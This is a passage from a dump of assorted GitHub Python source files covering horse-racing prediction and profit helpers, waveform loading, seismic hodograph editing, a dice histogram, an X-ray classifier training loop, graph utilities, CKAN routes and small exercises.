compute_df_placed(pred,real,df,match_id):\n \"\"\"\n return a df with information to draw the evolution of our investement\n \"\"\"\n real, pred = to_3_value(pred,real,df,match_id)\n L_odds = []\n for i in range(len(real)):\n L_odds.append([get_place_odds(df,match_id[i],real[i][j]) for j in range(len(real[i]))])\n\n df_draw = pd.DataFrame(list(zip(pred,real)), columns=['pred','real']) \n df_draw['place_odds_real'] = L_odds\n df_draw['profit'] = df_draw.apply(list_to_odds,axis=1)\n df_draw['cumul'] = df_draw['profit'].cumsum()\n df_draw['cumul_100'] = df_draw['cumul'] + 100\n return df_draw\n\ndef list_to_odds(x):\n \"\"\"\n return the amount of money we win according to prediction, real values and place_odds\n \"\"\"\n tot = 0\n list_pred = x.pred\n list_real = x.real\n place_odds_real = x.place_odds_real\n for i in range(len(list_real)):\n if list_real[i] in list_pred:\n tot = tot + place_odds_real[i] - 1\n else:\n tot = tot - 1\n return tot\n\ndef create_label(df_entry):\n \"\"\"\n return a df with label at 1 or 0\n \"\"\"\n df = df_entry.copy()\n df.loc[df.hm_runners>=7,'result'] = df[df.hm_runners>=7][df.columns[-14:]].applymap(lambda x: 1 if 0.5 < x < 3.5 else 0)\n df.loc[df.hm_runners<7,'result'] = df[df.hm_runners<7][df.columns[-14:]].applymap(lambda x: 1 if 0.5 < x < 2.5 else 0)\n return df\n\ndef function_less_place_odds(df):\n \"\"\"\n this function return the mean of each 3 less place_odds\n \"\"\"\n List_ = df.place_odds[:].values\n M = []\n for i in range(len(L)):\n J = sorted(L[i][np.nonzero(L[i])])[:2]\n if len(J)!=0:\n M.append(np.mean(sorted(L[i][np.nonzero(L[i])])[:2]))\n return np.mean(M)\n\ndef compute_gain(y_test,y_pred,df,match_id):\n \"\"\"\n compute the gain and some other usefull informations\n \"\"\"\n good_guesses = 0\n tot = 0\n revenue = 0\n real, pred = to_3_value(y_pred,y_test.values,df,match_id)\n L = []\n for i in range(len(y_test)):\n \n for j in range(len(pred[i])):\n if pred[i][j] in real[i]:\n good_guesses += 1\n val = df.place_odds[:][pred[i][j]].tolist()[i]\n L.append(val)\n revenue = revenue + val\n\n tot = tot + len(real[i])\n\n return revenue, tot, good_guesses, np.mean(L)\n\ndef compute_df_placed_xgb(pred,real,df,match_id):\n \"\"\"\n return a df with information to draw the evolution of our investement\n \"\"\"\n L = []\n for i in range(len(real)):\n L.append([get_place_odds(df,match_id[i],real[i][j]) for j in range(len(real[i]))])\n\n Z = pd.DataFrame(list(zip(pred,real)), columns=['pred','real']) \n Z['place_odds_real'] = L\n Z['profit'] = Z.apply(list_to_odds,axis=1)\n Z['cumul'] = Z['profit'].cumsum()\n Z['cumul_100'] = Z['cumul'] + 100\n return Z\n\ndef change_shape(pred_bad_shape):\n \"\"\"\n change the shape of the prediction\n \"\"\"\n A = [pred_bad_shape[i][:,1] for i in range(14)]\n\n return [np.array([A[i][j] for i in range(14)]) for j in range(len(A[0]))]\n\ndef mean_place_odds(X_test_init):\n \"\"\"\n function which return the mean place odd for all race and all horse for this month\n \"\"\"\n list_place_odds = X_test_init.place_odds.values\n\n non_null_place_odds = []\n\n for L in list_place_odds:\n for j in L:\n if j!=0:\n non_null_place_odds.append(j)\n \n return np.mean(non_null_place_odds)\n\ndef ensemble_model_placed(pred_dl,pred_lgbm,coef_dl):\n \"\"\"\n Compute the ensemble result thanks to percentage prediciton \n \"\"\"\n new_pred = coef_dl*pred_dl + (1-coef_dl)*pred_lgbm\n return new_pred\n\ndef train_dl(num_neutron,batch_size,epoch,X_train,y_train,X_test,y_test):\n \"\"\"\n This function will allow us to train our deep learning model\n \"\"\"\n\n model = tf.keras.Sequential([\n tf.keras.layers.Dense(num_neutron, activation='relu', input_shape=(1618,)),\n tf.keras.layers.Dense(14, activation='softmax')\n ])\n\n model.compile(optimizer=tf.keras.optimizers.Adam(5e-04),\n loss=tf.keras.losses.CategoricalCrossentropy(),\n metrics=[tf.keras.metrics.Precision(name='precision')])\n\n dataset = tf.data.Dataset.from_tensor_slices((X_train.values, y_train.values))\n train_dataset = dataset.shuffle(len(X_train)).batch(batch_size)\n\n dataset = tf.data.Dataset.from_tensor_slices((X_test.values, y_test.values))\n validation_dataset = dataset.shuffle(len(X_test)).batch(batch_size)\n\n print(\"Start training..\\n\")\n history = model.fit(train_dataset, epochs=epoch, validation_data=validation_dataset)\n print(\"Done.\")\n return model\n\ndef compute_profil(month, X_train, y_train, X_test, y_test, y_train_value, y_test_value, X_test_init):\n \"\"\"\n Compute profit for all models (Deep Learning, LGBM, Ensemble model)\n \"\"\"\n \n X_TEST = create_X_TEST(X_test_init)\n \n match_race_id_from_indices = X_test_init.race_id.to_list()\n\n model = keras.models.load_model(f'model/placed_DL_{month}.h5')\n y_pred_dl = model.predict(X_test)\n\n revenue,hm_bet,good_guesses,mean_sucess_pred = compute_gain(y_test,y_pred_dl,X_TEST,match_race_id_from_indices)\n \n perc_dl = round((good_guesses / hm_bet) * 100,2)\n\n profit_DL = revenue-hm_bet \n\n filename = f'model/winner_lgbm_{month}'\n\n #load saved model\n lgbm = joblib.load(filename)\n \n y_pred_lgbm = lgbm.predict_proba(X_test)\n\n revenue,hm_bet,good_guesses,mean_sucess_pred = compute_gain(y_test,y_pred_lgbm,X_TEST,match_race_id_from_indices)\n \n perc_lgbm = round((good_guesses / hm_bet) * 100,2)\n\n profit_lgbm = revenue-hm_bet\n \n pred_proba_dl = model.predict_proba(X_test)\n pred_proba_lgbm = lgbm.predict_proba(X_test)\n \n pred_classes = ensemble_model_placed(pred_proba_dl,pred_proba_lgbm,0.3)\n\n revenue,hm_bet,good_guesses,mean_sucess_pred = compute_gain(y_test,pred_classes,X_TEST,match_race_id_from_indices)\n \n perc_conso = round((good_guesses / hm_bet) * 100,2)\n\n profil_conso = revenue-hm_bet \n\n return profit_DL, profit_lgbm, pred_proba_dl, pred_proba_lgbm, profil_conso,perc_dl,perc_lgbm,perc_conso, hm_bet\n","repo_name":"codeworks-data/mvp-horse-racing-prediction","sub_path":"placed/placed_functions.py","file_name":"placed_functions.py","file_ext":"py","file_size_in_byte":11749,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"72"} +{"seq_id":"13679840975","text":"import pandas as pd\nimport numpy as np\n\n\ndef load_dataset(filepath, samplesize=None, chunksize=None):\n \"\"\"Returns an iterator over chunks of a dataset of waveforms as pandas dataframes. Separator is ';'. Dataframe must be indexed by 'index'-column\".\n\n :param filepath: Path to file\n :type filepath: str\n :param samplesize: Sample size. if None, then all is loaded\n :type samplesize: int\n :param chunksize: Size of loaded chunks. if None, then all is loaded in one chunk\n :type chunksize: int\n :return: a pandas dataframe\n :rtype: pandas.DataFrame\n \"\"\"\n skip = None\n if samplesize is not None:\n import random\n row_count = sum(1 for line in open(filepath))-1\n skip = sorted(random.sample(range(1,row_count+1),row_count-samplesize))\n\n call = pd.read_csv(filepath,\n sep=\";\",\n index_col=\"index\",\n skiprows=skip,\n chunksize=chunksize)\n\n if chunksize is not None:\n for chunk in call:\n yield chunk\n else:\n yield call\n\n\ndef waveform2matrix(df, wv_cols=list(map(str, range(64)))):\n \"\"\"Takes a dataframe containing waveforms and returns a numpy\n matrix containing the waveforms.\n\n :param df: Dataframe containing waveforms\n :type df: pandas.DataFrame\n :param wv_cols: Column names of waveforms,\n defaults to list(map(str, range(64)))\n :type wv_cols: List, optional\n :return: a [#samples]x[#waveform_dimension]-matrix\n :rtype: np.ndarray\n \"\"\"\n # this matrix will make it easier to plot samples\n mat = np.zeros((df.shape[0], len(wv_cols)))\n for idx, col in enumerate(wv_cols):\n mat[:, idx] = df[col].values\n return mat\n","repo_name":"graps1/deepwaveform","sub_path":"deepwaveform/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18075578045","text":"from typing import List, Optional, Dict\n\nfrom PyQt5.QtWidgets import QFileDialog\nfrom bokeh.document import Document\nfrom bokeh.models import ColumnDataSource\n\nfrom bokeh_server.utils.SingletonMeta import SingletonMeta\n\n\nclass GodografType:\n Manual = \"Manual\"\n SemiAutomatic = \"Semi-automatic\"\n Automatic = \"Automatic\"\n Mer = \"MER\"\n Em = \"EM\"\n STA_LTA = \"STA/LTA\"\n\n\nclass GodografData:\n def __init__(self):\n self.points_x = []\n self.points_y = []\n self.colors = []\n\n\nclass Godograf:\n def __init__(self, name):\n self.is_active = True\n self.visible = True\n self.current_color = \"blue\"\n self._color_changed = False\n self.fixed = False\n self.name = name\n self.current_part: Optional[GodografData] = None\n\n def set_color_changed(self, value):\n self._color_changed = value\n\n def add_color(self, color):\n print(\"COLOR:\", color)\n self.current_part.colors.append(color)\n\n def add_coord_x(self, x):\n self.current_part.points_x.append(x)\n\n def add_coord_y(self, y):\n self.current_part.points_y.append(y)\n\n def is_visible(self):\n return self.visible\n\n def set_visible(self, value):\n self.visible = value\n\n @property\n def color_changed(self):\n return self._color_changed\n\n\nclass GodografSettings(metaclass=SingletonMeta):\n current_travels_name: None\n\n def __init__(self):\n self.is_control = False\n self.current_godograf: Optional[Godograf] = None\n self.current_index = 0\n self.all_godografs: Dict[str, Dict[str, ColumnDataSource]] = {}\n self.reset_points_x = False\n self.reset_points_y = False\n self.reset_points_color = False\n self.reset_points = False\n self.current_file_name = None\n self.current_travels_name = None\n self.energy_source: Dict[str, int] = {}\n self.docs: Dict[str, Document] = {}\n self.step = 5\n self.type = \"Manual\"\n self.files_is_open = False\n\n def get_is_control(self):\n return self.is_control\n\n def set_is_control(self, value=None):\n if value:\n self.is_control = value\n else:\n self.is_control = not self.is_control\n\n def create_new_godograf(self, f_name: str, g_name: str):\n godograf = Godograf(g_name)\n godograf_data = GodografData()\n if f_name not in self.all_godografs:\n self.all_godografs[f_name] = {}\n self.all_godografs[f_name][g_name] = godograf\n self.all_godografs[f_name][g_name].current_part = godograf_data\n self.current_godograf = self.all_godografs[f_name][g_name]\n\n def create_or_choise_part_godograf(self, f_name: str, name: str):\n\n # if not self.current_godograf:\n # return\n if f_name not in self.all_godografs:\n self.all_godografs[f_name] = {}\n if name not in self.all_godografs[f_name]:\n godograf_data = GodografData()\n self.all_godografs[f_name][name] = Godograf(name)\n self.all_godografs[f_name][name].current_part = godograf_data\n self.current_godograf = self.all_godografs[f_name][name]\n else:\n self.current_godograf = self.all_godografs[f_name][name]\n if self.current_travels_name != name:\n self.reset_points = True\n self.current_travels_name = name\n\n #\n\n def save_godograf(self, godograf_name):\n name = QFileDialog.getSaveFileName()\n if name[0] != \"\":\n file = open(name[0], \"w\")\n for key, value in self.all_godografs.items():\n if godograf_name in value:\n a = value[godograf_name]\n for i in zip(a.data[\"x\"], a.data[\"y\"]):\n file.write(str(self.energy_source[key]) + \", \" + str(i[0]) + \", \" + str(i[1]) + \"\\n\")\n\n file.close()\n\n def get_current_godograf(self):\n return self.current_godograf\n\n def set_current_godograf_color(self, new_color):\n new_colors = []\n # todo\n if new_color != self.current_godograf.current_color:\n for i in range(len(self.current_godograf.current_part.colors)):\n new_colors.append(new_color)\n self.current_godograf.current_part.colors = new_colors\n self.current_godograf.current_color = new_color\n #\n # self.current_godograf.current_part.colors = new_colors\n # self.current_godograf.current_part.current_color = new_color\n # self.current_godograf.set_color_changed(True)\n\n def get_current_godograf_color(self):\n return self.current_godograf.current_part.colors\n\n def color_was_changed(self):\n return self.current_godograf.color_changed\n\n def set_current_godograf(self, file_name: str, travels_name: str):\n\n # self.create_or_choise_part_godograf(self.current_file_name, self.current_travels_name)\n # self.create_or_choise_part_godograf(file_name, travels_name)\n self.current_godograf = self.all_godografs[file_name][travels_name]\n self.reset_points = True\n\n def press_arrow_up(self):\n new_points_y = []\n for i in self.current_godograf.current_part.points_y:\n new_points_y.append(i - self.step)\n print(new_points_y)\n self.current_godograf.current_part.points_y = new_points_y\n self.reset_points_y = True\n\n def press_arrow_down(self):\n new_points_y = []\n for i in self.current_godograf.current_part.points_y:\n new_points_y.append(i + self.step)\n print(new_points_y)\n self.current_godograf.current_part.points_y = new_points_y\n self.reset_points_y = True\n\n def change_tab(self, file_name, travels_name):\n # self.reset_points = True\n\n self.create_or_choise_part_godograf(file_name, travels_name)\n if self.current_godograf:\n self.current_godograf.set_color_changed(True)\n","repo_name":"Kognor1/diplom_v_2","sub_path":"bokeh_server/RenderData/godografs/Godograf.py","file_name":"Godograf.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27906836532","text":"from die import Die\nimport pygal\n\n#创建一个D6和一个D10\ndie_1 = Die( )\ndie_2 = Die(10)\n\n#投掷色子多次,并将结果储存在一个列表中\nresults = [ ]\nfor roll_num in range(50000):\n result = die_1.roll( ) + die_2.roll( )\n results.append(result)\n\n#分析结果\nfrequencies = [ ]\nmax_num = die_1.num_sides + die_2.num_sides\nfor value in range(2, max_num+1):\n frequency = results.count(value)\n frequencies.append(frequency)\n\n#可视化结果\nhist = pygal.Bar( )\n\nhist.title = 'Results of rolling a D6 and a D10 50000 times'\nhist.x_labels = [x for x in range(2, max_num+1)]\nfor i in range(2, max_num+1):\n hist.x_labels.append(i)\n\nhist.x_title = 'Result'\nhist.y_title = 'Frequency of Result'\n\nhist.add('D6 + D10', frequencies)\nhist.render_to_file('D6_and_D10.svg')\n","repo_name":"joyDDT/python_code","sub_path":"py/Python_Crash_Course/project2/different_dice.py","file_name":"different_dice.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14280386169","text":"import json\n\n\nclass Robot:\n def __init__(self, name, id, socket=None):\n self.name = name\n self.id = id\n self.socket = socket\n\n def dict(self):\n return {\n 'name': self.name,\n 'id': self.id\n }\n\n @staticmethod\n def parse(robot_json):\n robot_obj = json.loads(robot_json)\n return Robot(robot_obj['name'], robot_obj['id'])\n","repo_name":"eypiem/IoT-Robot-Server","sub_path":"models/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38159244474","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom src.xray.entity.config_entity import TrainingConfig\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom torch.optim.lr_scheduler import StepLR\nfrom torchsummary import summary\nfrom src.xray.components import model \nfrom tqdm import tqdm\n\n\n\n# model_architecture = model().Net()\n# # To check weather cuda is available in the system or not \n# use_cuda = torch.cuda.is_available()\n# device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n# print(\"Available processor {}\".format(device))\n# model = model_architecture.to(device)\n# # To check the model summary\n# summary(model, input_size=(3, 224, 224))\n\n\nclass ModelTrainer:\n def __init__(self, epoch, model, train_loader, test_loader, optimizer, device,config=TrainingConfig):\n self.config = config\n self.epoch = epoch\n self.model = model\n self.train_loader = train_loader\n self.test_loader = test_loader\n self.optimizer = optimizer\n self.device = device\n\n def train(self,):\n \"\"\"\n Description: To train the model \n \n input: model,device,train_loader,optimizer,epoch \n \n output: loss, batch id and accuracy\n \"\"\"\n self.model.train()\n pbar = tqdm(self.train_loader)\n correct = 0\n processed = 0\n for batch_idx, (data, target) in enumerate(pbar):\n # get data\n data, target = data.to(self.device), target.to(self.device)\n # Initialization of gradient\n self.optimizer.zero_grad()\n # In PyTorch, gradient is accumulated over backprop and even though thats used in RNN generally not used in CNN\n # or specific requirements\n ## prediction on data\n y_pred = self.model(data)\n # Calculating loss given the prediction\n loss = F.nll_loss(y_pred, target)\n # Backprop\n loss.backward()\n self.optimizer.step()\n # get the index of the log-probability corresponding to the max value\n pred = y_pred.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n processed += len(data)\n pbar.set_description(desc= f'Loss={loss.item()} Batch_id={batch_idx} Accuracy={100*correct/processed:0.2f}')\n\n\n def test(self,):\n \"\"\"\n Description: To test the model\n \n input: model, self.device, test_loader\n \n output: average loss and accuracy\n \n \"\"\"\n self.model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in self.test_loader:\n data, target = data.to(self.device), target.to(self.device)\n output = self.model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item()\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n test_loss /= len(self.test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\\n'.format(\n test_loss, correct, len(self.test_loader.dataset),\n 100. * correct / len(self.test_loader.dataset)))\n\n def initiate_training(self):\n # Defining the params for training \n model = self.model.to(self.device)\n # optimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.8)\n scheduler = StepLR(self.optimizer, step_size=6, gamma=0.5)\n # EPOCHS = 4\n # Training the model\n for epoch in range(self.epoch):\n print(\"EPOCH:\", epoch)\n self.train()\n scheduler.step()\n print('current Learning Rate: ', self.optimizer.state_dict()[\"param_groups\"][0][\"lr\"])\n self.test()\n #print(model.state_dict())\n\n torch.save(model.state_dict(),self.config.trained_model_path)\n ","repo_name":"jaydeepIneuron007/Lung_Xray_Classifier","sub_path":"src/xray/components/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37909507481","text":"import numpy as np\nimport pickle as pkl\nimport scipy.sparse as sp\nimport torch\n\n''' Fetch and preprocess dataset '''\ndef load_data(args):\n dataset = args.dataset\n metapaths = args.metapaths\n sc = args.sc\n data = pkl.load(open('data/{}.pkl'.format(dataset), \"rb\"))\n\n label = data['labels']\n N = label.shape[0]\n if args.incl_attr == 1:\n truefeatures = data['features'].astype(float)\n truefeatures = sp.lil_matrix(truefeatures)\n rownetworks = [data[\"layers\"][metapath] + np.eye(N) * sc for metapath in metapaths]\n rownetworks = [sp.csr_matrix(rownetwork) for rownetwork in rownetworks]\n idx_train = data[\"splits\"][\"-1\"]['train_idx'].ravel()\n idx_val = data[\"splits\"][\"-1\"]['val_idx'].ravel()\n idx_test = data[\"splits\"][\"-1\"]['test_idx'].ravel()\n\n truefeatures_list = []\n if args.incl_attr:\n for _ in range(len(rownetworks)):\n truefeatures_list.append(truefeatures)\n elif not args.incl_attr:\n truefeatures_list = rownetworks\n\n adj_list = list()\n for i in range(len(rownetworks)):\n row, col, data = list(), list(), list()\n row.extend(rownetworks[i].tocoo().row)\n col.extend(rownetworks[i].tocoo().col)\n data.extend(rownetworks[i].tocoo().data)\n assert len(row) == len(col) == len(data)\n c = torch.LongTensor(np.vstack((np.array(row), np.array(col))))\n adj_list.append(c)\n\n return rownetworks, adj_list, truefeatures_list, label, idx_train, idx_val, idx_test\n\n\n''' Get Semi-Supervised Cluster Similarity Kernel. '''\ndef get_cluster_kernel(nb_nodes, nb_classes, idx_train, labels):\n A = list() # List of SS-Cluster Kernels for each relation\n WY = sp.lil_matrix(np.zeros((nb_nodes, nb_classes))) # W is a penalty matrix\n WY[idx_train, :] = labels[idx_train, : ] # Filtering out test-label information\n WYW = WY.dot(WY.transpose()) # Label similarity kernel based on train-points\n A.append(torch.FloatTensor(WYW.todense()))\n\n return A\n\n###############################################\n# This section of code adapted from tkipf/gcn #\n###############################################\ndef preprocess_features(features):\n \"\"\"Row-normalize feature matrix and convert to tuple representation\"\"\"\n rowsum = np.array(features.sum(1))\n with np.errstate(divide='ignore'):\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_inv[np.isnan(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n return features.todense()\n\n\ndef normalize_adj(adj):\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n with np.errstate(divide='ignore'):\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_inv_sqrt[np.isnan(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n # a = adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt)\n a = adj.dot(d_mat_inv_sqrt)\n a = d_mat_inv_sqrt.dot(a)\n return a.tocoo()\n\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\n indices = torch.from_numpy(\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n values = torch.from_numpy(sparse_mx.data)\n shape = torch.Size(sparse_mx.shape)\n return torch.sparse.FloatTensor(indices, values, shape)\n\n","repo_name":"anasuamitra/ssdcm","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"74713948072","text":"def isdivisible7(num): \n n = len(num)\n if (n == 1):\n if (num==\"0\" or num==\"7\"): return 1\n else: return 0\n if (n % 3 == 1) : \n num = str(num) + \"00\"\n n += 2\n elif (n % 3 == 2) : \n num = str(num) + \"0\"\n n += 1\n GSum = 0\n p = 1\n for i in range(n - 1, -1, -1) : \n group = 0\n group += ord(num[i]) - ord('0') \n i -= 1\n group += (ord(num[i]) - ord('0')) * 10\n i -= 1\n group += (ord(num[i]) - ord('0')) * 100\n GSum = GSum + group * p \n p *= (-1) \n #print(GSum)\n return (GSum % 7 == 0) \n\ndef findSum(str1, str2): \n if (len(str1) > len(str2)): \n t = str1; \n str1 = str2; \n str2 = t; \n str = \"\"; \n n1 = len(str1); \n n2 = len(str2); \n str1 = str1[::-1]; \n str2 = str2[::-1]; \n carry = 0; \n for i in range(n1): \n sum = ((ord(str1[i]) - 48) + ((ord(str2[i]) - 48) + carry)); \n str += chr(sum % 10 + 48); \n carry = int(sum / 10); \n for i in range(n1, n2): \n sum = ((ord(str2[i]) - 48) + carry)\n str += chr(sum % 10 + 48)\n carry = (int)(sum / 10)\n if (carry): \n str += chr(carry + 48)\n str = str[::-1]\n return str; \n\nn = int(input())\nfor i in range(n):\n x = input()\n cnt = 0\n while (not isdivisible7(x)):\n rev = x[::-1]\n x = findSum(x, rev)\n cnt = cnt + 1\n #print(x)\n if cnt >= 1000: break\n if (cnt>=1000): print(-1)\n else: print(x)\n\n","repo_name":"dminhvu/CompetitiveProgramming","sub_path":"Coding Problems/ACM ICPC/Nothern Central/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74044670951","text":"import logging\n\nfrom ckan.plugins import toolkit\nfrom flask import Blueprint\n\nlogger = logging.getLogger(__name__)\n\nemc_blueprint = Blueprint(\n \"emc\", __name__, template_folder=\"templates\", url_prefix=\"/emc\"\n)\n\n\n@emc_blueprint.route(\"/request_dataset_maintenance/\")\ndef request_dataset_maintenance(dataset_id):\n toolkit.get_action(\"emc_request_dataset_maintenance\")(\n data_dict={\"pkg_id\": dataset_id}\n )\n toolkit.h[\"flash_notice\"](\n toolkit._(\n \"Organization publishers have been notified of your request. You are now \"\n \"following the dataset and will be notified when it has been modified.\"\n )\n )\n return toolkit.redirect_to(\"dataset.read\", id=dataset_id)\n\n\n@emc_blueprint.route(\n \"/request_dataset_management//\"\n)\ndef request_dataset_management(dataset_id, management_command):\n action_name = {\n \"maintenance\": \"emc_request_dataset_maintenance\",\n \"publication\": \"emc_request_dataset_publication\",\n }[management_command]\n toolkit.get_action(action_name)(data_dict={\"pkg_id\": dataset_id})\n toolkit.h[\"flash_notice\"](\n toolkit._(\n \"Organization publishers have been notified of your request. You are now \"\n \"following the dataset and will be notified when it has been modified.\"\n )\n )\n return toolkit.redirect_to(\"dataset.read\", id=dataset_id)\n","repo_name":"kartoza/ckanext-dalrrd-emc-dcpr","sub_path":"ckanext/dalrrd_emc_dcpr/blueprints/emc.py","file_name":"emc.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10006538329","text":"from aiortc import RTCDataChannel, RTCDataChannelParameters\n\nasync def create_data_channel(transport):\n parameter = RTCDataChannelParameters(\n id = 2,\n label=\"chat-1\",\n maxPacketLifeTime=10,\n maxRetransmits=None,\n negotiated=True,\n ordered=False,\n protocol=\"\"\n )\n return RTCDataChannel(transport=transport, parameters=parameter)","repo_name":"choudhary2000/nimble_ai","sub_path":"client/src/data_channel.py","file_name":"data_channel.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25962152197","text":"# !/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\n# @Time : 2022/1/13 0013 14:27\r\n# @Author : Administrator\r\n# @File : cs4for循环.py\r\n# @Software: PyCharm\r\n'''\r\nmoney=float(input('请输入金额:'))\r\nif 0<=money<=49:\r\n print('总金额为{}元,不打折'.format(money))\r\n\r\nelif 50<=money<=100:\r\n print('总金额为{}元,打9折'.format(money),0.9*money)\r\nelif 100 < money :\r\n print('总金额为{}元,打8折'.format(money),0.8*money)\r\n '''\r\nimport random\r\n\r\n'''\r\nmoney2=float(input('请输入一个整数:'))\r\nif money2 % 3==0 and money2 % 5==0:\r\n print(\"是3和5的公倍数,有优惠\")\r\nelse:\r\n print('miss优惠')\r\n'''\r\n# 石头剪刀布\r\n'''\r\ni=0\r\nwhile i<4:\r\n a=random.randint(1,3)\r\n money3 = float(input('请输入一个数(1-3):'))\r\n if money3-a==0:\r\n print('平局',a)\r\n elif (money3==1and a==2 ) or (money3==2and a==3 ) or (money3==3and a==1 ) :\r\n print('win',a)\r\n else:\r\n print('loser',a)\r\n\r\n i += 1\r\n'''\r\n# 打印星星\r\n# for i in range(4):\r\n# for a in range(4-i):\r\n# print('*',end=' ')\r\n# print()\r\n\r\n# 乘法口诀\r\n# for i in range(10):\r\n# for a in range(i):\r\n# print(a+1,'*',i,'=',(a+1)*i,end=' ')\r\n# print()\r\n\r\n# 列表推导式\r\nli=[]\r\nfor i in range(21):\r\n d='page{}'.format(i)\r\n li.append(d)\r\nprint(li)\r\n\r\nli2=['page{}'.format(i) for i in range(10)]\r\nprint(li2)\r\n\r\ntu =(11,22,55,5,3,7,3)\r\nli3=[i+1 for i in tu]\r\nprint(li3)\r\nli3=[i*10 for i in tu]\r\nprint(li3)\r\n\r\n\r\nli4=[1,2,3,4]\r\ncount=0\r\nfor a in li4:\r\n for b in li4 :\r\n for c in li4 :\r\n if a!=b and a!=c and c!=b:\r\n count+=1\r\n\r\nprint(count,'6')\r\n","repo_name":"ctrl00100/pythonProject","sub_path":"cs4for循环.py","file_name":"cs4for循环.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34591013225","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'Will Brennan'\n\nimport argparse\nimport logging\nimport cv2\nimport skin_detector\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-b', '--debug', dest='debug', action='store_true', help='enable debug logging')\n parser.add_argument('-t', '--thresh', dest='thresh', default=0.5, type=float, help='threshold for skin mask')\n args = parser.parse_args()\n\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n logger = logging.getLogger(\"main\")\n\n cam = cv2.VideoCapture(0)\n logging.info(\"press any key to exit\")\n\n while True:\n ret, img_col = cam.read()\n img_msk = skin_detector.process(img_col)\n\n skin_detector.scripts.display('img_col', img_col)\n skin_detector.scripts.display('img_msk', img_msk)\n skin_detector.scripts.display('img_skn', cv2.bitwise_and(img_col, img_col, mask=img_msk))\n\n waitkey = cv2.waitKey(5)\n if waitkey != -1:\n break\n","repo_name":"WillBrennan/SkinDetector","sub_path":"WebCam.py","file_name":"WebCam.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"75"} +{"seq_id":"18516824004","text":"__author__ = 'Richard'\nimport sys\nclass Solution:\n # @param {integer[][]} costs\n # @return {integer}\n def minCost(self, costs):\n n=len(costs)\n if n == 0:\n return 0\n dp=[[0 for col in range(3)] for row in range(2)]\n for j in range(3):\n dp[0][j]=costs[0][j]\n for i in range(1, n):\n for j in range(3):\n dp[1][j]=sys.maxint\n for k in range(1,3):\n dp[1][j]=min(dp[1][j], dp[0][(j+k)%3]+costs[i][j])\n for j in range(3):\n dp[0][j]=dp[1][j]\n return min(dp[0][0], dp[0][1], dp[0][2])","repo_name":"zhangruichang/Algorithm","sub_path":"Leetcode/Python/PaintHouse.py","file_name":"PaintHouse.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70302030323","text":"# the essentials\nimport os\nfrom math import pi\nimport numpy as np\n\n# jax_fdm\nfrom jax_fdm.optimization import OptimizationRecorder\n\nfrom jax_fdm.datastructures import FDNetwork\n\nfrom jax_fdm.equilibrium import EquilibriumModel\nfrom jax_fdm.equilibrium import fdm\nfrom jax_fdm.equilibrium import network_update\n\nfrom jax_fdm.visualization import Viewer\n\n\n# ==========================================================================\n# Read in optimization history\n# ==========================================================================\n\nname = \"monkey_saddle\"\n\nmodify_view = 